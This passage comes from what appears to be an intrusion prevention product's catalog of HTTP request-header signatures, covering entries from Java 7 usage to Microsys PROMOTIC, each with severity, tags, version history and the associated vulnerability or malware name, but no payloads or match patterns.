About this situation: Java 7 version 1.7.0_09 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_10-Usage

About this situation: Java 7 version 1.7.0_10 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-501-5211
Last changed: sgpkg-ips-501-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-7-Version-1.7.0_11-Usage

About this situation: Java 7 version 1.7.0_11 usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Minor Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-506-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Java-8-Usage

About this situation: Java 1.8.x usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Major Browser Versions, TCP Client Traffic
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Joltid-Peerenabler

About this situation: Joltid PeerEnabler activity detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Joltid PeerEnabler, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Joltid-Peerenabler
Description:
Back to top

HTTP_CSH-Joomla-JCE-Vulnerability-Crawler

About this situation: Joomla JCE Vulnerability Crawler User-Agent detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Joomla-Remote-Code-Execution-Vulnerability

About this situation: An attempt to exploit a vulnerability in Joomla detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1470-5242
Vulnerability: Joomla-Remote-Code-Execution-Vulnerability
Description:
Back to top

HTTP_CSH-Jyxobot-Web-Spider

About this situation: Jyxobot web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Juxobot, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Keenvalue

About this situation: KeenValue traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, KeenValue, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Keenvalue
Description:
Back to top

HTTP_CSH-Kelihos-Bot-Activity

About this situation: Kelihos Bot Activity Detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Kelihos-Botnet
Description:
Back to top

HTTP_CSH-Known-Exploit-Kit-Headers

About this situation: Common HTTP header parameters seen used by exploit kits detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-964-5242
Last changed: sgpkg-ips-1469-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

HTTP_CSH-Konqueror-Browser-Usage

About this situation: Konqueror browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Konqueror, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-207-2032
Last changed: sgpkg-ips-207-2032
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-KTorrent-Client

About this situation: KTorrent P2P Client Detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, BitTorrent, Any Operating System not specific, BitTorrent not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-318-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: BitTorrent-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Laravel-Framework-Unusual-X-XSRF-TOKEN-Length

About this situation: An unusually long X-XSRF-TOKEN value detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Laravel, CVE2018, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1677-5242
Last changed: sgpkg-ips-1677-5242
Vulnerability: Laravel-Remote-Code-Execution-CVE-2018-15133
Description:
Back to top

HTTP_CSH-Large-Content-Length-Value-In-SRMP-POST-Request

About this situation: An SRMP POST request with a large content length value
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1752-5242
Last changed: sgpkg-ips-1752-5242
Description:
Back to top

HTTP_CSH-Legacy-Chakra-Based-Microsoft-Edge-Usage

About this situation: Obsolete Edge browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Windows, Any Hardware, Microsoft Edge, Windows not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Vulnerability: Legacy-Chakra-Based-Microsoft-Edge-Usage
Description:
Back to top

HTTP_CSH-Lexmark-Markvision-Enterprise-Remote-Code-Execution

About this situation: An attempt to exploit a Lexmark Markvision Enterprise Remote Code Execution vulnerability detected.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lexmark MarkVision Enterprise, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1527-5242
Vulnerability: Lexmark-Markvision-Enterprise-Remote-Code-Execution
Description:
Back to top

HTTP_CSH-LG-LED-Assistant-API-Changepw-Unverified-Password-Reset

About this situation: An attempt to exploit a vulnerability in LG LED Assistant detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, LG LED Assistant, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Vulnerability: LG-LED-Assistant-API-Changepw-Unverified-Password-Reset
Description:
Back to top

HTTP_CSH-LibWhisker-Nikto-Scan-Detect

About this situation: Whisker Vulnerability Scanner
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Probe, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-563-5211
Vulnerability: HTTP-Whisker-Vulnerability-Scanner
Description:
Back to top

HTTP_CSH-Libwww-Perl-User-Agent

About this situation: Libwww Perl User Agent Seen
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Lighttpd-Connection-Header-Parsing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Lighttpd Project Lighttpd detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lighttpd, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-1470-5242
Vulnerability: Lighttpd-Connection-Header-Parsing-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Lighttpd-Host-Header-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Lighttpd Project Lighttpd detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lighttpd, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-1641-5242
Vulnerability: Lighttpd-Host-Header-Mod_mysql_vhost-SQL-Injection
Lighttpd-Host-Header-Mod_Simple_vhost-Directory-Traversal
Description:
Back to top

HTTP_CSH-Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Lighttpd Project Lighttpd detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Lighttpd, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Lighttpd-Mod_Extforward-Plugin-Mod_extforward_Forwarded-Denial-Of-Service
Description:
Back to top

HTTP_CSH-Limewire-User-Agent

About this situation: Detects Limewire User-Agent
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Limewire, Any Operating System not specific, Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: Limewire-Peer-To-Peer-Network-Usage
Description:
Back to top

HTTP_CSH-Linux-Backdoor-C2-Traffic

About this situation: Linux backdoor C2 traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Linux-Backdoor-C2-Traffic
Description:
Back to top

HTTP_CSH-Locky-B-Control-Traffic

About this situation: HTTP traffic related to Locky Ransomware detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Locky-B-Control-Traffic
Description:
Back to top

HTTP_CSH-Logitech-Desktop-Messenger-Backweb-Update

About this situation: Logitech Desktop Messenger Updater check detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Long-Basic-Authorization-Header

About this situation: A long authorization header with basic scheme
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-500-5211
Last changed: sgpkg-ips-1398-5242
Vulnerability: Long-Basic-Authorization-Header
Description:
Back to top

HTTP_CSH-Long-Range-Or-Range-Request-Header

About this situation: An HTTP Request with a long Range or Range-Request header detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1476-5242
Description:
Back to top

HTTP_CSH-Long-Referer-Header-Detected

About this situation: A very long HTTP Referer header detected
Context: HTTP Request Header Line
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Description:
Back to top

HTTP_CSH-Lop

About this situation: Lop traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Lop, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-615-5211
Vulnerability: Lop
Description:
Back to top

HTTP_CSH-Lynx-Browser-Usage

About this situation: Lynx browser usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Lynx, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-260-3038
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Maazben-Bot-Traffic

About this situation: Maazben Bot traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Maazben-Bot
Description:
Back to top

HTTP_CSH-MailEnable-HTTP-Authorization-Header-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in MailEnable MailEnable Enterprise detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, MailEnable, CVE2005, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-506-5211
Vulnerability: MailEnable-HTTP-Authorization-Header-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Mama-Casper-Attack-Tool-Detected

About this situation: Mama Casper Attack Tool Detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Code-Injection-Attack-Tool
Description:
Back to top

HTTP_CSH-Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in ManageEngine EventLog Analyzer detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, ManageEngine EventLog Analyzer, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1588-5242
Vulnerability: Manageengine-EventLog-Analyzer-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CSH-Marketscore-OSSProxy-Internet-Accelerator-User-Agent

About this situation: Marketscore OSSProxy Internet Accelerator User Agent detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-518-5211
Vulnerability: Marketscore-OSSProxy-Internet-Accelerator-User-Agent
Description:
Back to top

HTTP_CSH-McAfee-Epolicy-Orchestrator-DoS

About this situation: Denial of service attempt against McAfee ePolicy Orchestrator
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, McAfee ePolicy Orchestrator, CVE2004, Any Operating System not specific, Denial of Service, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-McAfee-Epolicy-Orchestrator-DoS
Description:
Back to top

HTTP_CSH-McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in McAfee Firewall Reporter
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, McAfee Firewall Reporter, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1732-5242
Vulnerability: McAfee-Firewall-Reporter-IsValidClient-Remote-Code-Execution
Description:
Back to top

HTTP_CSH-McAfee-Web-Gateway-Usage

About this situation: McAfee Web Gateway usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Media-Viewer-StubInstStat-User-Agent

About this situation: Delfin Media Viewer activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Delfin Media Viewer, Windows not specific, Spyware, Malware and Adware, TCP Client Traffic
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1638-5242
Vulnerability: Delfin-Media-Viewer
Description:
Back to top

HTTP_CSH-MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085

About this situation: An attempt to exploit a vulnerability in MegaRAC detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, MegaRAC, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: MegaRAC-Authentication-Bypass-Via-Redfish-CVE-2024-54085
Description:
Back to top

HTTP_CSH-Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059

About this situation: An attempt to exploit a vulnerability in Microsoft .NET Framework detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft .NET Framework, MS2024-01, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1833-5242
Last changed: sgpkg-ips-1833-5242
Vulnerability: Microsoft-.NET-Framework-Information-Disclosure-CVE-2024-29059
Description:
Back to top

HTTP_CSH-Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509

About this situation: An attempt to exploit a remote code execution vulnerability in Active Directory Federation Services detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2009-12, CVE2009, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-270-3038
Last changed: sgpkg-ips-270-3038
Vulnerability: Microsoft-ADFS-Remote-Code-Execution-CVE-2009-2509
Description:
Back to top

HTTP_CSH-Microsoft-Bing-Web-Spider

About this situation: Microsoft Bing web spider detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Microsoft Bing, Any Operating System not specific, Known Crawlers, TCP Client Traffic
First detected in: sgpkg-ips-374-4219
Last changed: sgpkg-ips-516-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Microsoft-BITS-Usage

About this situation: Microsoft Background Intelligent Transfer Service (BITS) usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Microsoft BITS, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-211-2032
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Microsoft-CryptoAPI-Usage

About this situation: Microsoft CryptoAPI usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Mac OS X, Any Hardware, Apple Aperture, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-1638-5242
Description:
Back to top

HTTP_CSH-Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Microsoft-Exchange-Authentication-Bypass-CVE-2021-33766
Description:
Back to top

HTTP_CSH-Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server
Context: HTTP Request Header Line
Severity: 10
Tags: Windows, Any Hardware, Exchange Server, CVE2021, Windows not specific, Exchange Server not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1325-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855
Description:
Back to top

HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow

About this situation: A vulnerability on Microsoft IIS 6.0 detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows 2003, Any Hardware, IIS 6.0, CVE2017, Windows 2003 not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-870-5242
Last changed: sgpkg-ips-883-5242
Vulnerability: Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow-2

About this situation: A vulnerability on Microsoft IIS 6.0 detected
Context: HTTP Request Header Line
Severity: 10
Tags: Windows 2003, Any Hardware, IIS 6.0, CVE2017, Windows 2003 not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Microsoft-IIS-6-ScStoragePathFromUrl-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080

About this situation: An attempt to exploit a vulnerability in Microsoft Message Queuing Service detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2024-06, CVE2024, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1736-5242
Last changed: sgpkg-ips-1736-5242
Vulnerability: Microsoft-Message-Queuing-Remote-Code-Execution-CVE-2024-30080
Description:
Back to top

HTTP_CSH-Microsoft-Negotiate-SSP-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2004, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-435-4219
Vulnerability: Microsoft-Negotiate-SSP-Buffer-Overflow
Description:
Back to top

HTTP_CSH-Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange OWA detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook Web Access, MS2015-03, CVE2015, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1528-5242
Vulnerability: Microsoft-OWA-XSS-Vulnerability-CVE-2015-1628
Description:
Back to top

HTTP_CSH-Microsoft-Remote-Code-Execution-IIS-CVE-2015-1635

About this situation: An attempt to exploit a vulnerability in Microsoft IIS detected
Context: HTTP Request Header Line
Severity: 10
Tags: Windows 7, Windows 8, Windows 2012, Windows 8.1, Windows 2012 R2, Any Hardware, IIS, MS2015-04, CVE2015, IIS not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-638-5211
Last changed: sgpkg-ips-975-5242
Vulnerability: Microsoft-IIS-Remote-Code-Execution-CVE-2015-1635
Description:
Back to top

HTTP_CSH-Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2023-06, CVE2023, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1600-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Microsoft-Sharepoint-Authentication-Bypass-CVE-2023-29357
Description:
Back to top

HTTP_CSH-Microsoft-Windows-DLL-Hijack-Vulnerability

About this situation: Detects applications attempting to access DLL files over HTTP, possible DLL hijack attempt
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1620-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Microsoft-Windows-DLL-Hijack-Vulnerability
Description:
Back to top

HTTP_CSH-Microsoft-Windows-Remote-Desktop-Protocol-Over-WebSocket

About this situation: A Windows's remote destop connection over WebSocket detected
Context: HTTP Request Header Line
Severity: 1
Tags: Windows, Any Hardware, Microsoft Windows Remote Desktop, CVE2024, Windows not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1817-5242
Last changed: sgpkg-ips-1817-5242
Vulnerability: Microsoft-Windows-Remote-Desktop-Protocol-Websocketserver-Use-After-Free
Description:
Back to top

HTTP_CSH-Microsoft-Windows-RSS-Platform-Usage

About this situation: Microsoft Windows RSS platform usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Microsoft-Windows-Update-Agent-Usage

About this situation: Microsoft Windows Update Agent usage detected
Context: HTTP Request Header Line
Severity: 1
Tags: Windows, Any Hardware, Windows not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1638-5242
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Microsoft-WNS-Message-User-Agent

About this situation: Microsoft Windows Push Notification Service (WNS) Message User-Agent detected
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-641-5211
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CSH-Microsoft-WSDAPI-Memory-Corruption-MS09-063

About this situation: An attempt to exploit a vulnerability in Microsoft Web Services on Devices API detected
Context: HTTP Request Header Line
Severity: 10
Tags: Windows Vista, Windows 2008, Any Hardware, MS2009-11, CVE2009, Windows Vista not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-578-5211
Vulnerability: Microsoft-WSDAPI-Memory-Corruption-MS09-063
Description:
Back to top

HTTP_CSH-Microsoft_IIS_5.0_WebDav_Request_Directory_Security_Bypass

About this situation: A security bypass vulnerability exists in the Microsoft Internet Information Services (IIS) product.
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, MS2009-06, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-356-4219
Vulnerability: Microsoft-IIS-5.0-WebDav-Request-Directory-Security-Bypass
Description:
Back to top

HTTP_CSH-Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsys Promotic detected
Context: HTTP Request Header Line
Severity: 7
